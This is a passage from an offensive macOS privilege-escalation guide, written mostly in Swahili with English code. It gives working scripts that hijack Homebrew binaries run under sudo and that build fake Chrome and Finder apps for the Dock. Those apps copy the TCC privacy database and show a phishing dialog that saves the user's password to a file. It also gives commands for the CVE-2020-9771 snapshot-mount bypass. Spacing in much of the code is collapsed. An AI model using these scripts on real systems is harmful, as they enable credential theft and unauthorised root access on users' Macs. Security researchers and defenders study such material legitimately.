However, macOS inaendelea na PATH ya mtumiaji anapotekeleza sudo. Hii inamaanisha kwamba njia nyingine ya kufanikisha shambulio hili ingekuwa kudhibiti binaries nyingine ambazo mwathirika bado atatekeleza anapokuwa akifanya sudo:
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATHcat>/opt/homebrew/bin/ls<<EOF#!/bin/bashif [ "\$(id -u)" -eq 0 ]; thenwhoami > /tmp/privescfi/bin/ls "\$@"EOFchmod+x/opt/homebrew/bin/ls# victimsudols
Note that a user that uses the terminal will highly probable have Homebrew installed. So it's possible to hijack binaries in /opt/homebrew/bin.
Dock Impersonation
Using some social engineering you could impersonate for example Google Chrome inside the dock and actually execute your own script:
Some suggestions:
Check in the Dock if there is a Chrome, and in that case remove that entry and add the fakeChrome entry in the same position in the Dock array.
#!/bin/sh# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';rm-rf/tmp/Google\ Chrome.app/2>/dev/null# Create App structuremkdir-p/tmp/Google\ Chrome.app/Contents/MacOSmkdir-p/tmp/Google\ Chrome.app/Contents/Resources# Payload to executecat>/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /Applications/Google\\\\ Chrome.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c-o/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chromerm-rf/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.cchmod+x/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome# Info.plistcat<<EOF>/tmp/Google\ Chrome.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Google Chrome</string><key>CFBundleIdentifier</key><string>com.google.Chrome</string><key>CFBundleName</key><string>Google Chrome</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Google Chromecp/Applications/Google\ Chrome.app/Contents/Resources/app.icns/tmp/Google\ Chrome.app/Contents/Resources/app.icns# Add to Dockdefaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep0.1killallDock
Baadhi ya mapendekezo:
Huwezi kuondoa Finder kutoka kwenye Dock, hivyo ikiwa unataka kuiongeza kwenye Dock, unaweza kuweka Finder bandia karibu na ile halisi. Kwa hili unahitaji kuongeza kipengee cha Finder bandia mwanzoni mwa orodha ya Dock.
Chaguo lingine ni kutokuweka kwenye Dock na kuifungua tu, "Finder inahitaji kudhibiti Finder" si ya ajabu sana.
Chaguo lingine ili kuinua hadi root bila kuomba nenosiri kwa sanduku mbaya, ni kufanya Finder kweli kuomba nenosiri ili kutekeleza kitendo chenye mamlaka:
Omba Finder nakala kwa /etc/pam.d faili mpya ya sudo (Kichocheo kinachoomba nenosiri kitaonyesha kwamba "Finder inataka nakala sudo")
Omba Finder nakala ya Plugin ya Uidhinishaji mpya (Unaweza kudhibiti jina la faili ili kichocheo kinachoomba nenosiri kitaonyesha kwamba "Finder inataka nakala Finder.bundle")
#!/bin/sh# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';rm-rf/tmp/Finder.app/2>/dev/null# Create App structuremkdir-p/tmp/Finder.app/Contents/MacOSmkdir-p/tmp/Finder.app/Contents/Resources# Payload to executecat>/tmp/Finder.app/Contents/MacOS/Finder.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /System/Library/CoreServices/Finder.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Finder.app/Contents/MacOS/Finder.c-o/tmp/Finder.app/Contents/MacOS/Finderrm-rf/tmp/Finder.app/Contents/MacOS/Finder.cchmod+x/tmp/Finder.app/Contents/MacOS/Finder# Info.plistcat<<EOF>/tmp/Finder.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Finder</string><key>CFBundleIdentifier</key><string>com.apple.finder</string><key>CFBundleName</key><string>Finder</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Findercp/System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns/tmp/Finder.app/Contents/Resources/app.icns# Add to Dockdefaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep0.1killallDock
TCC - Kuinua Privilege ya Root
CVE-2020-9771 - mount_apfs TCC bypass na kuinua privilege
Mtumiaji yeyote (hata wasio na mamlaka) anaweza kuunda na kuunganisha picha ya mashine ya wakati na kufikia FAILI ZOTE za picha hiyo.
Mamlaka pekee inayohitajika ni kwa programu inayotumika (kama Terminal) kuwa na Upatikanaji wa Disk Kamili (FDA) (kTCCServiceSystemPolicyAllfiles) ambayo inahitaji kupewa na admin.
# Create snapshottmutillocalsnapshot# List snapshotstmutillistlocalsnapshots/Snapshotsfordisk/:com.apple.TimeMachine.2023-05-29-001751.local# Generate folder to mount itcd/tmp# I didn it from this foldermkdir/tmp/snap# Mount it, "noowners" will mount the folder so the current user can access everything/sbin/mount_apfs-onoowners-scom.apple.TimeMachine.2023-05-29-001751.local/System/Volumes/Data/tmp/snap# Access itls/tmp/snap/Users/admin_user# This will work
